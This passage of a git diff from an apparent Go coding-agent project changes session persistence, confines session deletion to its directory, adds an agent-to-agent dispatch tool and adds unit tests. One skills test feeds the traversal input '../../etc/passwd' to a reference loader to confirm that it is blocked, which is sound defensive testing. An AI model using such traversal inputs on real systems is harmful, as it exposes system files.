+		}
+	}
+	if match != nil {
+		return match, nil
 	}
 	return nil, fmt.Errorf("session %s not found for cwd %s", sessionID, cwd)
 }
 
+func sessionFileID(path string) string {
+	base := filepath.Base(path)
+	base = strings.TrimSuffix(base, ".jsonl")
+	if idx := strings.Index(base, "_"); idx >= 0 {
+		return base[idx+1:]
+	}
+	return ""
+}
+
 // AppendMessage adds a message entry.
 func (m *Manager) AppendMessage(msg provider.Message) (string, error) {
 	m.mu.Lock()
 	defer m.mu.Unlock()
 
+	if err := m.ensureInitializedLocked(); err != nil {
+		return "", err
+	}
+
 	id := GenerateID()
 	entry := MessageEntry{
 		EntryBase: EntryBase{
@@ -221,6 +276,10 @@ func (m *Manager) AppendModelChange(providerName, modelID string) (string, error
 	m.mu.Lock()
 	defer m.mu.Unlock()
 
+	if err := m.ensureInitializedLocked(); err != nil {
+		return "", err
+	}
+
 	id := GenerateID()
 	entry := ModelChangeEntry{
 		EntryBase: EntryBase{
@@ -247,6 +306,10 @@ func (m *Manager) AppendThinkingLevelChange(level string) (string, error) {
 	m.mu.Lock()
 	defer m.mu.Unlock()
 
+	if err := m.ensureInitializedLocked(); err != nil {
+		return "", err
+	}
+
 	id := GenerateID()
 	entry := ThinkingLevelChangeEntry{
 		EntryBase: EntryBase{
@@ -272,6 +335,10 @@ func (m *Manager) AppendCompaction(summary, firstKeptEntryID string, tokensBefor
 	m.mu.Lock()
 	defer m.mu.Unlock()
 
+	if err := m.ensureInitializedLocked(); err != nil {
+		return "", err
+	}
+
 	id := GenerateID()
 	entry := CompactionEntry{
 		EntryBase: EntryBase{
@@ -299,6 +366,10 @@ func (m *Manager) AppendSessionInfo(name string) (string, error) {
 	m.mu.Lock()
 	defer m.mu.Unlock()
 
+	if err := m.ensureInitializedLocked(); err != nil {
+		return "", err
+	}
+
 	id := GenerateID()
 	entry := SessionInfoEntry{
 		EntryBase: EntryBase{
@@ -321,8 +392,8 @@ func (m *Manager) AppendSessionInfo(name string) (string, error) {
 
 // GetMessages extracts all messages from the current branch.
 func (m *Manager) GetMessages() []provider.Message {
-	m.mu.Lock()
-	defer m.mu.Unlock()
+	m.mu.RLock()
+	defer m.mu.RUnlock()
 
 	var messages []provider.Message
 	for _, e := range m.entries {
@@ -447,14 +518,29 @@ func (m *Manager) load() error {
 		return err
 	}
 	if corruptLines > 0 {
-		return fmt.Errorf("session file has %d corrupt line(s)", corruptLines)
+		log.Printf("[session] warning: skipped %d corrupt line(s) in %s", corruptLines, m.file)
 	}
 	return nil
 }
 
 // writeEntry writes a single entry to the session file.
-// DeleteSession deletes a session file.
-func DeleteSession(path string) error {
+// DeleteSession deletes a session file if it is under sessionDir.
+func DeleteSession(path string, sessionDir string) error {
+	cleanPath, err := filepath.Abs(filepath.Clean(path))
+	if err != nil {
+		return fmt.Errorf("resolve session path: %w", err)
+	}
+	cleanSessionDir, err := filepath.Abs(filepath.Clean(sessionDir))
+	if err != nil {
+		return fmt.Errorf("resolve session dir: %w", err)
+	}
+	rel, err := filepath.Rel(cleanSessionDir, cleanPath)
+	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
+		return fmt.Errorf("session path %s is outside session directory %s", path, sessionDir)
+	}
+	if filepath.Ext(cleanPath) != ".jsonl" {
+		return fmt.Errorf("session path %s is not a .jsonl file", path)
+	}
 	return os.Remove(path)
 }
 
@@ -477,11 +563,7 @@ func ListForDirDetailed(cwd, sessionDir string) ([]SessionDetail, error) {
 	for _, s := range sessions {
 		d := SessionDetail{SessionInfo: s}
 		// Extract ID from filename: YYYYMMDD-HHMMSS_ID.jsonl
-		base := filepath.Base(s.Path)
-		base = strings.TrimSuffix(base, ".jsonl")
-		if idx := strings.Index(base, "_"); idx >= 0 {
-			d.ID = base[idx+1:]
-		}
+		d.ID = sessionFileID(s.Path)
 
 		// Read session to count messages and get preview
 		mgr := &Manager{file: s.Path}
@@ -532,6 +614,12 @@ func (m *Manager) writeEntry(entry interface{}) error {
 	}
 
 	data = append(data, '\n')
-	_, err = f.Write(data)
-	return err
+	if _, err := f.Write(data); err != nil {
+		return fmt.Errorf("write session entry: %w", err)
+	}
+	// fsync to guarantee durability on crash/power loss.
+	if err := f.Sync(); err != nil {
+		return fmt.Errorf("sync session file: %w", err)
+	}
+	return nil
 }
diff --git a/internal/session/session_test.go b/internal/session/session_test.go
index 4512faa..3087db2 100644
--- a/internal/session/session_test.go
+++ b/internal/session/session_test.go
@@ -1,8 +1,10 @@
 package session
 
 import (
+	"fmt"
 	"os"
 	"path/filepath"
+	"strings"
 	"testing"
 	"time"
 
@@ -113,6 +115,29 @@ func TestAppendMessage(t *testing.T) {
 	}
 }
 
+func TestAppendMessageAutoInitializesSession(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	m := New("/tmp/test", sessionDir)
+	id, err := m.AppendMessage(provider.NewUserMessage("Hello"))
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if id == "" {
+		t.Fatal("expected non-empty message ID")
+	}
+	if m.GetHeader() == nil {
+		t.Fatal("expected session header to be initialized")
+	}
+	if m.GetFile() == "" {
+		t.Fatal("expected session file to be initialized")
+	}
+	if _, err := os.Stat(m.GetFile()); err != nil {
+		t.Fatalf("expected session file to exist: %v", err)
+	}
+}
+
 func TestAppendModelChange(t *testing.T) {
 	tmpDir := t.TempDir()
 	sessionDir := filepath.Join(tmpDir, "sessions")
@@ -368,13 +393,23 @@ func TestContinueRecentNew(t *testing.T) {
 		t.Fatal("expected non-nil manager")
 	}
 
-	// Should be a new session (no file)
-	if m.file != "" {
-		t.Errorf("expected empty file for new session, got '%s'", m.file)
+	if m.file == "" {
+		t.Fatal("expected new session file")
+	}
+	if m.header == nil {
+		t.Fatal("expected new session header")
+	}
+	if _, err := os.Stat(m.file); err != nil {
+		t.Fatalf("expected session file to exist: %v", err)
+	}
+	if _, err := m.AppendMessage(provider.NewUserMessage("Hello")); err != nil {
+		t.Fatalf("append message to new continued session: %v", err)
 	}
 }
 
 func TestContinueRecentDefaultDir(t *testing.T) {
+	t.Setenv("HOME", t.TempDir())
+
 	// Test with empty session dir (should use default)
 	m, err := ContinueRecent("/tmp/test", "")
 	if err != nil {
@@ -386,6 +421,125 @@ func TestContinueRecentDefaultDir(t *testing.T) {
 	}
 }
 
+func TestOpenByPathOrID(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	m1 := New("/tmp/test", sessionDir)
+	if err := m1.InitWithID("session-test-id"); err != nil {
+		t.Fatalf("init session: %v", err)
+	}
+
+	byPath, err := OpenByPathOrID("/tmp/test", sessionDir, m1.file)
+	if err != nil {
+		t.Fatalf("open by path: %v", err)
+	}
+	if byPath.file != m1.file {
+		t.Errorf("expected file %q, got %q", m1.file, byPath.file)
+	}
+
+	byID, err := OpenByPathOrID("/tmp/test", sessionDir, "session-test-id")
+	if err != nil {
+		t.Fatalf("open by id: %v", err)
+	}
+	if byID.file != m1.file {
+		t.Errorf("expected file %q, got %q", m1.file, byID.file)
+	}
+
+	shortID := sessionFileID(m1.file)
+	byShortID, err := OpenByPathOrID("/tmp/test", sessionDir, shortID)
+	if err != nil {
+		t.Fatalf("open by short id: %v", err)
+	}
+	if byShortID.file != m1.file {
+		t.Errorf("expected file %q, got %q", m1.file, byShortID.file)
+	}
+}
+
+func TestOpenByPathOrIDAmbiguousPrefix(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	ids := []string{"abcdef01", "abcdef02"}
+	for _, id := range ids {
+		m := New("/tmp/test", sessionDir)
+		if err := m.InitWithID(id); err != nil {
+			t.Fatalf("init session %s: %v", id, err)
+		}
+	}
+
+	_, err := OpenByPathOrID("/tmp/test", sessionDir, "abc")
+	if err == nil {
+		t.Fatal("expected ambiguous prefix error")
+	}
+	if !strings.Contains(err.Error(), "ambiguous") {
+		t.Fatalf("err = %q, want ambiguous", err)
+	}
+}
+
+func TestLoadRejectsCorruptSessionLine(t *testing.T) {
+	tmpDir := t.TempDir()
+	path := filepath.Join(tmpDir, "session.jsonl")
+	data := fmt.Sprintf(
+		"{\"type\":\"%s\",\"version\":%d,\"id\":\"session-id\",\"timestamp\":\"%s\",\"cwd\":\"/tmp/test\"}\nnot-json\n",
+		EntrySession,
+		CurrentVersion,
+		time.Now().Format(time.RFC3339Nano),
+	)
+	if err := os.WriteFile(path, []byte(data), 0600); err != nil {
+		t.Fatalf("write session: %v", err)
+	}
+
+	// Corrupt lines are now tolerated (logged as warning) rather than rejected.
+	m, err := Open(path)
+	if err != nil {
+		t.Fatalf("expected session to load despite corrupt line, got error: %v", err)
+	}
+	if m == nil {
+		t.Fatal("expected non-nil session manager")
+	}
+	hdr := m.GetHeader()
+	if hdr == nil {
+		t.Fatal("expected header to be loaded")
+	}
+	if hdr.ID != "session-id" {
+		t.Fatalf("header ID = %q, want %q", hdr.ID, "session-id")
+	}
+}
+
+func TestAppendEntriesMaintainParentChain(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	m := New("/tmp/test", sessionDir)
+	if err := m.Init(); err != nil {
+		t.Fatalf("init session: %v", err)
+	}
+
+	firstID, err := m.AppendMessage(provider.NewUserMessage("first"))
+	if err != nil {
+		t.Fatalf("append first: %v", err)
+	}
+	secondID, err := m.AppendModelChange("openai", "model")
+	if err != nil {
+		t.Fatalf("append second: %v", err)
+	}
+
+	if len(m.entries) != 2 {
+		t.Fatalf("entries = %d, want 2", len(m.entries))
+	}
+	second, ok := m.entries[1].(ModelChangeEntry)
+	if !ok {
+		t.Fatalf("entry type = %T, want ModelChangeEntry", m.entries[1])
+	}
+	if second.ParentID == nil || *second.ParentID != firstID {
+		t.Fatalf("second parent = %#v, want %s", second.ParentID, firstID)
+	}
+	if leaf := m.GetLeafID(); leaf == nil || *leaf != secondID {
+		t.Fatalf("leaf = %#v, want %s", leaf, secondID)
+	}
+}
+
 func TestGenerateID(t *testing.T) {
 	id1 := GenerateID()
 	id2 := GenerateID()
@@ -433,3 +587,296 @@ func TestSessionInfo(t *testing.T) {
 		}
 	}
 }
+
+func TestDeleteSession(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	m := New("/tmp/test", sessionDir)
+	m.Init()
+
+	path := m.GetFile()
+	if _, err := os.Stat(path); err != nil {
+		t.Fatalf("session file should exist: %v", err)
+	}
+
+	err := DeleteSession(path, sessionDir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if _, err := os.Stat(path); !os.IsNotExist(err) {
+		t.Error("expected session file to be deleted")
+	}
+}
+
+func TestDeleteSessionNonExistent(t *testing.T) {
+	sessionDir := t.TempDir()
+	err := DeleteSession(filepath.Join(sessionDir, "missing.jsonl"), sessionDir)
+	if err == nil {
+		t.Error("expected error for non-existent file")
+	}
+}
+
+func TestDeleteSessionRejectsPathOutsideSessionDir(t *testing.T) {
+	sessionDir := t.TempDir()
+	outside := filepath.Join(t.TempDir(), "outside.jsonl")
+	if err := os.WriteFile(outside, []byte("{}"), 0600); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := DeleteSession(outside, sessionDir); err == nil {
+		t.Fatal("expected outside session path to be rejected")
+	}
+}
+
+func TestListForDirDetailed(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	// Create a session with messages
+	m := New("/tmp/test", sessionDir)
+	m.Init()
+	m.AppendMessage(provider.NewUserMessage("Hello world"))
+	m.AppendMessage(provider.NewAssistantMessage([]provider.ContentBlock{
+		{Type: "text", Text: "Hi there"},
+	}))
+	m.AppendMessage(provider.NewUserMessage("Another message"))
+
+	details, err := ListForDirDetailed("/tmp/test", sessionDir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if len(details) != 1 {
+		t.Fatalf("expected 1 session detail, got %d", len(details))
+	}
+
+	d := details[0]
+	if d.MessageCount != 3 {
+		t.Errorf("expected 3 messages, got %d", d.MessageCount)
+	}
+	if d.Preview != "Hello world" {
+		t.Errorf("expected preview 'Hello world', got %q", d.Preview)
+	}
+	if d.ID == "" {
+		t.Error("expected non-empty ID")
+	}
+}
+
+func TestListForDirDetailedLongPreview(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	m := New("/tmp/test", sessionDir)
+	m.Init()
+	// Message longer than 60 chars
+	longMsg := strings.Repeat("a", 100)
+	m.AppendMessage(provider.NewUserMessage(longMsg))
+
+	details, err := ListForDirDetailed("/tmp/test", sessionDir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if len(details) != 1 {
+		t.Fatalf("expected 1 session, got %d", len(details))
+	}
+
+	if len(details[0].Preview) > 64 { // 60 + "..."
+		t.Errorf("preview should be truncated, got length %d", len(details[0].Preview))
+	}
+	if !strings.HasSuffix(details[0].Preview, "...") {
+		t.Error("expected truncated preview to end with '...'")
+	}
+}
+
+func TestListForDirDetailedEmpty(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	details, err := ListForDirDetailed("/tmp/nonexistent", sessionDir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(details) != 0 {
+		t.Errorf("expected 0 details, got %d", len(details))
+	}
+}
+
+func TestListForDirDetailedContentBlocks(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	m := New("/tmp/test", sessionDir)
+	m.Init()
+	// User message with content blocks (no Content field)
+	m.AppendMessage(provider.Message{
+		Role: "user",
+		Contents: []provider.ContentBlock{
+			{Type: "text", Text: "Block content"},
+		},
+	})
+
+	details, err := ListForDirDetailed("/tmp/test", sessionDir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if len(details) != 1 {
+		t.Fatalf("expected 1 session, got %d", len(details))
+	}
+	if details[0].Preview != "Block content" {
+		t.Errorf("expected preview 'Block content', got %q", details[0].Preview)
+	}
+}
+
+func TestAppendSessionInfo(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	m := New("/tmp/test", sessionDir)
+	m.Init()
+
+	id, err := m.AppendSessionInfo("My Session")
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if id == "" {
+		t.Error("expected non-empty ID")
+	}
+	if len(m.entries) != 1 {
+		t.Errorf("expected 1 entry, got %d", len(m.entries))
+	}
+}
+
+func TestEncodePath(t *testing.T) {
+	// Same path should produce same encoding
+	e1 := encodePath("/tmp/test")
+	e2 := encodePath("/tmp/test")
+	if e1 != e2 {
+		t.Error("expected same encoding for same path")
+	}
+
+	// Different paths should produce different encodings
+	e3 := encodePath("/tmp/test2")
+	if e1 == e3 {
+		t.Error("expected different encoding for different path")
+	}
+
+	// Paths that are similar but different should not collide
+	e4 := encodePath("/tmp/test-1")
+	e5 := encodePath("/tmp/test:1")
+	if e4 == e5 {
+		t.Error("expected different encoding for paths with different special chars")
+	}
+}
+
+func TestInitWithID(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	m := New("/tmp/test", sessionDir)
+	err := m.InitWithID("custom-id")
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	header := m.GetHeader()
+	if header.ID != "custom-id" {
+		t.Errorf("expected ID 'custom-id', got %q", header.ID)
+	}
+}
+
+func TestSessionFileID(t *testing.T) {
+	tests := []struct {
+		path     string
+		expected string
+	}{
+		{"/path/to/20240101-120000_abcd1234.jsonl", "abcd1234"},
+		{"/path/to/session.jsonl", ""},
+		{"simple_id.jsonl", "id"},
+	}
+
+	for _, tt := range tests {
+		result := sessionFileID(tt.path)
+		if result != tt.expected {
+			t.Errorf("sessionFileID(%q) = %q, want %q", tt.path, result, tt.expected)
+		}
+	}
+}
+
+func TestOpenByPathOrIDEmptyValue(t *testing.T) {
+	_, err := OpenByPathOrID("/tmp", "/tmp/sessions", "")
+	if err == nil {
+		t.Error("expected error for empty value")
+	}
+}
+
+func TestSessionRoundTrip(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	// Create session with various entry types
+	m1 := New("/tmp/test", sessionDir)
+	m1.Init()
+	m1.AppendMessage(provider.NewUserMessage("Hello"))
+	m1.AppendMessage(provider.NewAssistantMessage([]provider.ContentBlock{
+		{Type: "text", Text: "Hi"},
+	}))
+	m1.AppendModelChange("anthropic", "claude-sonnet-4-20250514")
+	m1.AppendThinkingLevelChange("high")
+	m1.AppendCompaction("Summary", "", 1000)
+	m1.AppendSessionInfo("Test Session")
+
+	// Re-open and verify all entries loaded
+	m2, err := Open(m1.GetFile())
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if len(m2.entries) != 6 {
+		t.Errorf("expected 6 entries, got %d", len(m2.entries))
+	}
+
+	msgs := m2.GetMessages()
+	if len(msgs) != 2 {
+		t.Errorf("expected 2 messages, got %d", len(msgs))
+	}
+}
+
+// TestWriteEntryDurable verifies that entries are fsynced and survive reopen.
+func TestWriteEntryDurable(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	m := New("/tmp/test", sessionDir)
+	if err := m.Init(); err != nil {
+		t.Fatalf("init: %v", err)
+	}
+
+	// Append several messages
+	for i := 0; i < 5; i++ {
+		msg := provider.NewUserMessage(fmt.Sprintf("message %d", i))
+		if _, err := m.AppendMessage(msg); err != nil {
+			t.Fatalf("append message %d: %v", i, err)
+		}
+	}
+
+	// Re-open from disk — all 5 messages + 1 header should be present
+	reopened, err := Open(m.GetFile())
+	if err != nil {
+		t.Fatalf("reopen: %v", err)
+	}
+
+	loadedMsgs := reopened.GetMessages()
+	if len(loadedMsgs) != 5 {
+		t.Errorf("expected 5 messages after reopen, got %d", len(loadedMsgs))
+	}
+
+	// Verify content of last message
+	last := loadedMsgs[4]
+	if last.Content != "message 4" {
+		t.Errorf("last message content = %q, want 'message 4'", last.Content)
+	}
+}
diff --git a/internal/skills/skills_test.go b/internal/skills/skills_test.go
index ab8453b..548d8b7 100644
--- a/internal/skills/skills_test.go
+++ b/internal/skills/skills_test.go
@@ -323,6 +323,202 @@ func TestCreateProjectSkillsDir(t *testing.T) {
 	}
 }
 
+func TestParseReferences(t *testing.T) {
+	tmpDir := t.TempDir()
+
+	content := `# API Skill
+
+### 1. 基础 (references/base.md) [已加载]
+### 2. 高级 (references/advanced.md) [待按需加载]
+
+## References
+- [概述](references/overview.md)
+`
+
+	refs := parseReferences(content, tmpDir)
+	if len(refs) != 3 {
+		t.Fatalf("expected 3 references, got %d", len(refs))
+	}
+
+	// Check first ref is auto-load
+	if !refs[0].AutoLoad {
+		t.Error("expected first ref to be auto-loaded")
+	}
+	if refs[0].Path != "references/base.md" {
+		t.Errorf("expected path 'references/base.md', got %q", refs[0].Path)
+	}
+
+	// Check second ref is on-demand
+	if refs[1].AutoLoad {
+		t.Error("expected second ref to be on-demand")
+	}
+
+	// Check third ref from markdown link
+	if refs[2].Path != "references/overview.md" {
+		t.Errorf("expected path 'references/overview.md', got %q", refs[2].Path)
+	}
+	if refs[2].Label != "概述" {
+		t.Errorf("expected label '概述', got %q", refs[2].Label)
+	}
+}
+
+func TestParseReferencesDedup(t *testing.T) {
+	tmpDir := t.TempDir()
+
+	// Same ref in both header and link - should deduplicate
+	content := `# Skill
+### 1. Base (references/base.md) [已加载]
+- [Base](references/base.md)
+`
+	refs := parseReferences(content, tmpDir)
+	if len(refs) != 1 {
+		t.Errorf("expected 1 reference (deduped), got %d", len(refs))
+	}
+}
+
+func TestParseReferencesEmpty(t *testing.T) {
+	refs := parseReferences("# No references here", "/tmp")
+	if len(refs) != 0 {
+		t.Errorf("expected 0 references, got %d", len(refs))
+	}
+}
+
+func TestLoadReference(t *testing.T) {
+	tmpDir := t.TempDir()
+	skillDir := filepath.Join(tmpDir, "test-skill")
+	refsDir := filepath.Join(skillDir, "references")
+	os.MkdirAll(refsDir, 0755)
+
+	// Create skill with references
+	os.WriteFile(filepath.Join(skillDir, "SKILL.md"), []byte(`# Test
+### 1. Base (references/base.md) [待按需加载]
+`), 0644)
+	os.WriteFile(filepath.Join(refsDir, "base.md"), []byte("# Base Content\nThis is the base."), 0644)
+
+	m := NewManager(tmpDir, "")
+	m.Load()
+
+	// Load a known reference
+	content, ok := m.LoadReference("test-skill", "references/base.md")
+	if !ok {
+		t.Fatal("expected successful load")
+	}
+	if !contains(content, "Base Content") {
+		t.Errorf("expected content to contain 'Base Content', got %q", content)
+	}
+
+	// Load again (should use cached)
+	content2, ok := m.LoadReference("test-skill", "references/base.md")
+	if !ok {
+		t.Fatal("expected successful cached load")
+	}
+	if content != content2 {
+		t.Error("expected same content on cached load")
+	}
+}
+
+func TestLoadReferenceDirectFile(t *testing.T) {
+	tmpDir := t.TempDir()
+	skillDir := filepath.Join(tmpDir, "test-skill")
+	os.MkdirAll(skillDir, 0755)
+
+	os.WriteFile(filepath.Join(skillDir, "SKILL.md"), []byte("# Test Skill"), 0644)
+	os.WriteFile(filepath.Join(skillDir, "extra.md"), []byte("# Extra"), 0644)
+
+	m := NewManager(tmpDir, "")
+	m.Load()
+
+	// Load directly by path (not a parsed reference)
+	content, ok := m.LoadReference("test-skill", "extra.md")
+	if !ok {
+		t.Fatal("expected successful direct load")
+	}
+	if !contains(content, "Extra") {
+		t.Error("expected content to contain 'Extra'")
+	}
+}
+
+func TestLoadReferencePathEscape(t *testing.T) {
+	tmpDir := t.TempDir()
+	skillDir := filepath.Join(tmpDir, "test-skill")
+	os.MkdirAll(skillDir, 0755)
+	os.WriteFile(filepath.Join(skillDir, "SKILL.md"), []byte("# Test"), 0644)
+
+	m := NewManager(tmpDir, "")
+	m.Load()
+
+	// Attempt path traversal
+	_, ok := m.LoadReference("test-skill", "../../etc/passwd")
+	if ok {
+		t.Error("expected path escape to be blocked")
+	}
+}
+
+func TestLoadReferenceNonexistentSkill(t *testing.T) {
+	m := NewManager("", "")
+	m.Load()
+
+	_, ok := m.LoadReference("nonexistent", "file.md")
+	if ok {
+		t.Error("expected false for nonexistent skill")
+	}
+}
+
+func TestListReferences(t *testing.T) {
+	tmpDir := t.TempDir()
+	skillDir := filepath.Join(tmpDir, "test-skill")
+	os.MkdirAll(skillDir, 0755)
+	os.WriteFile(filepath.Join(skillDir, "SKILL.md"), []byte(`# Test
+### 1. Ref (references/ref.md) [待按需加载]
+`), 0644)
+
+	m := NewManager(tmpDir, "")
+	m.Load()
+
+	refs := m.ListReferences("test-skill")
+	if len(refs) != 1 {
+		t.Errorf("expected 1 reference, got %d", len(refs))
+	}
+
+	// Nonexistent skill
+	refs = m.ListReferences("nonexistent")
+	if refs != nil {
+		t.Error("expected nil for nonexistent skill")
+	}
+}
+
+func TestBuildSkillContextWithReferences(t *testing.T) {
+	tmpDir := t.TempDir()
+	skillDir := filepath.Join(tmpDir, "test-skill")
+	refsDir := filepath.Join(skillDir, "references")
+	os.MkdirAll(refsDir, 0755)
+
+	os.WriteFile(filepath.Join(skillDir, "SKILL.md"), []byte(`# Test Skill
+### 1. Auto (references/auto.md) [已加载]
+### 2. OnDemand (references/ondemand.md) [待按需加载]
+`), 0644)
+	os.WriteFile(filepath.Join(refsDir, "auto.md"), []byte("Auto-loaded content"), 0644)
+	os.WriteFile(filepath.Join(refsDir, "ondemand.md"), []byte("On-demand content"), 0644)
+
+	m := NewManager(tmpDir, "")
+	m.Load()
+
+	ctx := m.BuildSkillContext("test-skill")
+
+	if !contains(ctx, "Auto-loaded content") {
+		t.Error("expected auto-loaded content in context")
+	}
+	if contains(ctx, "On-demand content") {
+		t.Error("on-demand content should NOT be auto-loaded")
+	}
+	if !contains(ctx, "On-Demand References") {
+		t.Error("expected on-demand references section")
+	}
+	if !contains(ctx, "skill_ref") {
+		t.Error("expected skill_ref tool mention")
+	}
+}
+
 func TestSkill(t *testing.T) {
 	skill := &Skill{
 		Name:        "test",
diff --git a/internal/tools/a2a_dispatch.go b/internal/tools/a2a_dispatch.go
new file mode 100644
index 0000000..adb0595
--- /dev/null
+++ b/internal/tools/a2a_dispatch.go
@@ -0,0 +1,105 @@
+package tools
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+)
+
+// A2ADispatcher is the interface needed by the a2a_dispatch tool.
+// It is satisfied by a2a.A2AManager.
+type A2ADispatcher interface {
+	List() []AgentEntry
+	Dispatch(ctx context.Context, name, message string) (string, error)
+}
+
+// AgentEntry is a minimal view of a remote A2A agent.
+type AgentEntry struct {
+	Name string
+	URL  string
+}
+
+// A2ADispatchTool sends tasks to registered remote A2A agents.
+type A2ADispatchTool struct {
+	dispatcher A2ADispatcher
+}
+
+// NewA2ADispatchTool creates a new A2A dispatch tool.
+func NewA2ADispatchTool(dispatcher A2ADispatcher) *A2ADispatchTool {
+	return &A2ADispatchTool{dispatcher: dispatcher}
+}
+
+func (t *A2ADispatchTool) Name() string {
+	return "a2a_dispatch"
+}
+
+func (t *A2ADispatchTool) Description() string {
+	return "Send a task to a registered remote A2A agent. The agent will execute the task and return the result."
+}
+
+func (t *A2ADispatchTool) PromptSnippet() string {
+	return "Dispatch tasks to remote A2A agents"
+}
+
+func (t *A2ADispatchTool) PromptGuidelines() []string {
+	return []string{
+		"Use a2a_dispatch to delegate tasks to specialized remote agents.",
+		"Each agent has specific capabilities described in its Agent Card.",
+		"Long-running tasks may take up to 5 minutes to complete.",
+	}
+}
+
+func (t *A2ADispatchTool) Parameters() json.RawMessage {
+	// Build enum from registered agents
+	agents := t.dispatcher.List()
+	agentNames := make([]string, 0, len(agents))
+	for _, a := range agents {
+		agentNames = append(agentNames, a.Name)
+	}
+
+	// Build agent descriptions for the LLM
+	agentDesc := "Available agents:\n"
+	for _, a := range agents {
+		agentDesc += fmt.Sprintf("  - %s (%s)\n", a.Name, a.URL)
+	}
+
+	return json.RawMessage(fmt.Sprintf(`{
+		"type": "object",
+		"properties": {
+			"agent_name": {
+				"type": "string",
+				"description": %q,
+				"enum": %s
+			},
+			"message": {
+				"type": "string",
+				"description": "The task message to send to the agent"
+			}
+		},
+		"required": ["agent_name", "message"]
+	}`, agentDesc, mustMarshalJSON(agentNames)))
+}
+
+func (t *A2ADispatchTool) Execute(ctx context.Context, params map[string]any) (ToolResult, error) {
+	agentName, ok := params["agent_name"].(string)
+	if !ok || agentName == "" {
+		return ToolResult{}, fmt.Errorf("missing required parameter: agent_name")
+	}
+
+	message, ok := params["message"].(string)
+	if !ok || message == "" {
+		return ToolResult{}, fmt.Errorf("missing required parameter: message")
+	}
+
+	result, err := t.dispatcher.Dispatch(ctx, agentName, message)
+	if err != nil {
+		return ToolResult{}, err
+	}
+
+	return NewTextToolResult(result), nil
+}
+
+func mustMarshalJSON(v any) string {
+	data, _ := json.Marshal(v)
+	return string(data)
+}
diff --git a/internal/tools/bash.go b/internal/tools/bash.go
index 731e48b..e59cd37 100644
--- a/internal/tools/bash.go
+++ b/internal/tools/bash.go
@@ -14,6 +14,7 @@ import (
 
 	"github.com/startvibecoding/vibecoding/internal/platform"
 	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/util"
 	"github.com/startvibecoding/vibecoding/internal/vendored"
 )
 
@@ -55,7 +56,7 @@ type BashTool struct {
 	jobManager *JobManager
 }
 
-// NewBashTool creates a new bash tool.
+// NewBashTool creates a new bash tool with a new JobManager.
 func NewBashTool(r *Registry) *BashTool {
 	return &BashTool{
 		registry:   r,
@@ -63,6 +64,14 @@ func NewBashTool(r *Registry) *BashTool {
 	}
 }
 
+// NewBashToolWithJM creates a new bash tool with an existing JobManager.
+func NewBashToolWithJM(r *Registry, jm *JobManager) *BashTool {
+	return &BashTool{
+		registry:   r,
+		jobManager: jm,
+	}
+}
+
 // GetJobManager returns the job manager for background processes.
 func (t *BashTool) GetJobManager() *JobManager {
 	return t.jobManager
@@ -154,9 +163,9 @@ func (t *BashTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 	workDir := t.registry.GetWorkDir()
 
 	// 构建环境变量，将 ~/.vibecoding/bin 加入 PATH
-	rgPath := vendored.RgPath()
 	vendoredBin := ""
-	if rgPath != "" {
+	if vendored.HasEmbeddedTools() {
+		rgPath := vendored.RgPath()
 		vendoredBin = filepath.Dir(rgPath)
 	}
 	env := os.Environ()
@@ -226,38 +235,51 @@ func (t *BashTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 		return NewTextToolResult(fmt.Sprintf("Started background job [%d] (PID: %d): %s\nUse 'jobs' tool to check status or 'kill' to stop.", job.ID, job.PID, command)), nil
 	}
 
-	// Synchronous mode
-	var stdout, stderr bytes.Buffer
-	cmd.Stdout = &stdout
-	cmd.Stderr = &stderr
+	// Synchronous mode (1 GB output limit per stream)
+	const maxSyncOutput = 1 << 30 // 1 GB
+	stdout := newLimitedBuffer(maxSyncOutput)
+	stderr := newLimitedBuffer(maxSyncOutput)
+	cmd.Stdout = stdout
+	cmd.Stderr = stderr
 
 	err := cmd.Run()
 
-	output := stdout.String()
-	if stderr.Len() > 0 {
-		if output != "" {
-			output += "\n"
+	stdoutStr := strings.TrimRight(string(stdout.Bytes()), "\n")
+	stderrStr := string(stderr.Bytes())
+	stderrStr = strings.TrimRight(stderrStr, "\n")
+	if stdoutStr == "" {
+		stdoutStr = "(no output)"
+	}
+	if stderrStr == "" {
+		stderrStr = "(no output)"
